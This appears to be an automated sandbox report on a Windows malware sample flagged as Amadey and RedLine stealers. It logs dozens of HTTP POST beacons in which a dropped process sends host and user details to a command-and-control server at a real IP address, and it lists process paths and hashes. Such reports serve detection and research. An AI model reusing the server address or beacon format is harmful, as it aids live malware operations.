                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.319797039 CET283INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        83192.168.2.54977362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:04.487845898 CET284OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.551690102 CET284INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        84192.168.2.54977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:04.719767094 CET285OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.784183979 CET285INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        85192.168.2.54977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:04.965034008 CET286OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.031927109 CET286INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        86192.168.2.54977662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:05.213337898 CET287OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.276880980 CET287INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        87192.168.2.54977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:05.460295916 CET288OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.525388002 CET288INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        88192.168.2.54977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:05.707869053 CET289OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.772675037 CET289INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        89192.168.2.54977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:05.941637993 CET290OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.007407904 CET290INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        9192.168.2.54969962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:30.811357975 CET209OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.874645948 CET210INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        90192.168.2.54978062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:06.175417900 CET291OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.244282007 CET291INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        91192.168.2.54978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:06.429229975 CET292OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.494554043 CET292INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        92192.168.2.54978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:06.679140091 CET293OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.743294001 CET293INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        93192.168.2.54978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:06.930392027 CET294OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.997920990 CET294INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        94192.168.2.54978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:07.177697897 CET295OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.251141071 CET295INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        95192.168.2.54978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:07.425626040 CET296OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.490989923 CET296INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        96192.168.2.54978662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:07.678071022 CET297OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.741566896 CET297INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        97192.168.2.54978762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:07.919083118 CET298OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.982109070 CET298INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        98192.168.2.54978862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:11.171370983 CET299OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.237281084 CET300INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        99192.168.2.54978962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:11.410183907 CET300OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.474111080 CET301INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:14:15:22
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                        Imagebase:0x10c0000
                                                        File size:598528 bytes
                                                        MD5 hash:61A8C6A50C4A2C2990E45BC223464333
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Target ID:1
                                                        Start time:14:15:22
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        Imagebase:0x1090000
                                                        File size:407040 bytes
                                                        MD5 hash:014BF36C5CA48AF27042E0BAF0B6D951
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 51%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:2
                                                        Start time:14:15:22
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                                                        Imagebase:0x400000
                                                        File size:375808 bytes
                                                        MD5 hash:A00A64A5A243C8705D68786C6159E402
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
